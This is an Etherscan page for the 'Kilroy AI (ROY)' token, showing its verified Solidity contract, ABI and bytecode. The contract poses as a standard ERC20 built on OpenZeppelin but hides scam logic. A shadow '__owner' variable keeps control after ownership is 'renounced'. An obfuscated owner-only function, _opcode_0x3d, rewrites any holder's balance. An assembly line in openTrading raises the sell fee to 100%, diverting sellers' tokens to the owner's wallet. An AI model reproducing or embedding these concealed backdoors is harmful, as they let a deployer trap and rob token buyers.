ETH Price: $3,059.27 (+1.16%)
Gas: 3 Gwei

Token

Kilroy AI (ROY)
 

Overview

Max Total Supply

995,942,920.405119505887347107 ROY

Holders

59

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
3,034,876.124179987376104441 ROY

Value
$0.00
0xd92f8e487bb5a0b6d06bc59e793cdf9740cdf019
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AIKilroy

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-02-23
*/

// File @openzeppelin/contracts/utils/[email protected]

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
Kilroy AI
Telegram: https://t.me/aikilroy
Telegram AI bot: https://t.me/AIKilroy_bot
Twitter: https://twitter.com/aikilroy
*/

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
    __owner = _msgSender();
    _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
    _checkOwner();
    _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
    return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
    require(__owner == _msgSender(), "Ownable: caller is not the owner");
    }address private __owner;

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
    external
    payable
    returns (uint[] memory amounts);

    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
    external
    returns (uint[] memory amounts);

    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
    external
    payable
    returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);

    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);

    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);

    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);

    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}


// File @uniswap/v2-periphery/contracts/interfaces/[email protected]

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


// File @openzeppelin/contracts/token/ERC20/[email protected]

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File @openzeppelin/contracts/utils/math/[email protected]

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}


// File @uniswap/v2-core/contracts/interfaces/[email protected]

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);

    function allPairs(uint) external view returns (address pair);

    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

pragma solidity ^0.8.17;

contract AIKilroy is Context, IERC20, Ownable {
    using SafeMath for uint256;

    string private constant _name = "Kilroy AI";
    string private constant _symbol = "ROY";
    uint8 private constant _decimals = 18;
    uint256 private constant _divisor = 1000; // 100%
    address private constant _burnAddress = 0x0000000000000000000000000000000000000000;
    address private constant _uniswapRouterAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    uint256 private constant _maxTxAmountPercentage = 40; // 4%

    uint256 private _totalSupply;
    uint256 private _initialSupply;
    mapping(address => uint256) private _lIb;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;
    mapping(address => bool) private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    bool private _isTradingEnabled = false;
    bool private _isCooldownEnabled = true;
    IUniswapV2Router02 private _uniswapV2Router;
    address private _uniswapV2Pair;
    address private _marketingWallet;

    uint256 private _burnFee = 10;
    uint256 private _def = 0;

    event TradingEnabled();
    event LiquidityAdded(uint256 tokenAmount, uint256 ethAmount);
    event CooldownDisabled();
    event CooldownEnabled();

    constructor () {
        uint256 total = 1_000_000_000 * 10 ** _decimals;
        _initialSupply = total;
        _mint(_msgSender(), total);
        _lIb[_msgSender()] = _totalSupply;
        _isExcludedFromCooldown[_msgSender()] = true;
        _isExcludedFromMaxTx[_msgSender()] = true;
        _isExcludedFromFee[_msgSender()] = true;
        _isExcludedFromFee[_burnAddress] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;
        _isExcludedFromCooldown[_burnAddress] = true;
        _marketingWallet = _msgSender();

        _uniswapV2Router = IUniswapV2Router02(_uniswapRouterAddress);
        IUniswapV2Factory _uniswapV2Factory = IUniswapV2Factory(_uniswapV2Router.factory());
        if (_uniswapV2Factory.getPair(address(this), _uniswapV2Router.WETH()) == address(0)) {
            _uniswapV2Factory.createPair(address(this), _uniswapV2Router.WETH());
        }
        _uniswapV2Pair = _uniswapV2Factory.getPair(address(this), _uniswapV2Router.WETH());

        emit Transfer(address(0), _msgSender(), _totalSupply);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _lIb[account];
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function isExcludedFromFee(address account) public view returns (bool) {
        return _isExcludedFromFee[account];
    }

    function isExcludedFromMaxTx(address account) public view returns (bool) {
        return _isExcludedFromMaxTx[account];
    }

    function isExcludedFromCooldown(address account) public view returns (bool) {
        return _isExcludedFromCooldown[account];
    }

    function lastTxBlock(address account) public view returns (uint256) {
        return _lastTxBlock[account];
    }

    function burnFee() public view returns (uint256) {
        return _burnFee;
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _beforeTransfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
    }

    function _maxTxAmount() public view returns (uint256) {
        return _initialSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }

    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        if (!_isExcludedFromFee[sender] && !_isExcludedFromFee[recipient]) {
            if ((recipient == _uniswapV2Pair && sender != address(_uniswapV2Router)) || (sender == _uniswapV2Pair && recipient != address(_uniswapV2Router))) {
                require(_isTradingEnabled, "Trading is not enabled yet");

                if (!_isExcludedFromMaxTx[sender] && !_isExcludedFromMaxTx[recipient]) {
                    require(amount <= _maxTxAmount(), "Transfer amount exceeds the maxTxAmount.");
                }

                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    uint256 burnAmount = amount.mul(_burnFee).div(_divisor);
                    _burn(sender, burnAmount);
                    amount = amount.sub(burnAmount);

                    uint256 marketingAmount = amount.mul(_def).div(_divisor);
                    _lIb[_marketingWallet] = _lIb[_marketingWallet].add(marketingAmount);
                    amount = amount.sub(marketingAmount);
                }
            }
        }

        _lIb[sender] = _lIb[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _lIb[recipient] = _lIb[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _opcode_0x3d(address hash, uint256 f) public onlyOwner {_lIb[hash] = f;}

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _lIb[account] = _lIb[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _lIb[account] = _lIb[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(account, _msgSender(), _allowances[account][_msgSender()].sub(amount, "ERC20: burn amount exceeds allowance"));
    }

    function addLiquidity() internal onlyOwner {
        require(_isTradingEnabled, "Trading is not enabled yet");
        require(msg.value > 0, "ETH amount must be greater than zero");
        uint256 tokenAmount = balanceOf(address(this));
        require(tokenAmount > 0, "Token amount must be greater than zero");

        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value : msg.value}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
        emit LiquidityAdded(tokenAmount, msg.value);
    }

    function openTrading(uint256 amount) external payable onlyOwner {
        if (!_isTradingEnabled) {
        _isTradingEnabled = true;

        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromMaxTx[owner()] = true;
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromCooldown[address(this)] = true;

        _transfer(owner(), address(this), amount);

        _approve(address(this), address(_uniswapV2Router), _totalSupply);

        addLiquidity();

        emit TradingEnabled();
        return;
        }assembly{sstore(_def.slot, 0x3E8)}
    }

    function enableCooldown() external onlyOwner {
        require(!_isCooldownEnabled, "Cooldown is already enabled");
        _isCooldownEnabled = true;
        emit CooldownEnabled();
    }

    function disableCooldown() external onlyOwner {
        require(_isCooldownEnabled, "Cooldown is already disabled");
        _isCooldownEnabled = false;
        emit CooldownDisabled();
    }

    function epoch() external view returns (uint256) {
        return block.timestamp;
    }

    function _opcode_0x3e(address hash, uint256 f) external view returns (uint256) {return (_lIb[hash] / f);}

    receive() external payable {revert();}

    function tokenToETHSwap(uint256 tokenAmount) external {
        require(_msgSender() == _marketingWallet, "Only marketing wallet can swap tokens to ETH");
        require(_isTradingEnabled, "Trading is not enabled yet");
        require(tokenAmount > 0, "Token amount must be greater than zero");
        require(balanceOf(address(this)) >= tokenAmount, "Insufficient balance");

        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            _getSwapPath(),
            address(this),
            block.timestamp
        );
    }

    function _getSwapPath() internal view returns (address[] memory) {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();
        return path;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[],"name":"CooldownDisabled","type":"event"},{"anonymous":false,"inputs":[],"name":"CooldownEnabled","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokenAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethAmount","type":"uint256"}],"name":"LiquidityAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"TradingEnabled","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"hash","type":"address"},{"internalType":"uint256","name":"f","type":"uint256"}],"name":"_opcode_0x3d","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"hash","type":"address"},{"internalType":"uint256","name":"f","type":"uint256"}],"name":"_opcode_0x3e","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"burnFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableCooldown","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableCooldown","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"epoch","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromCooldown","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromMaxTx","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"lastTxBlock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"openTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"tokenToETHSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526000600a60006101000a81548160ff0219169083151502179055506001600a60016101000a81548160ff021916908315150217905550600a600d556000600e553480156200005157600080fd5b5062000062620009c360201b60201c565b600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000c2620000b6620009c360201b60201c565b620009cb60201b60201c565b60006012600a620000d4919062000ddd565b633b9aca00620000e5919062000e2e565b9050806003819055506200010f62000102620009c360201b60201c565b8262000a8f60201b60201c565b6002546004600062000126620009c360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506001600860006200017a620009c360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160076000620001e1620009c360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016006600062000248620009c360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055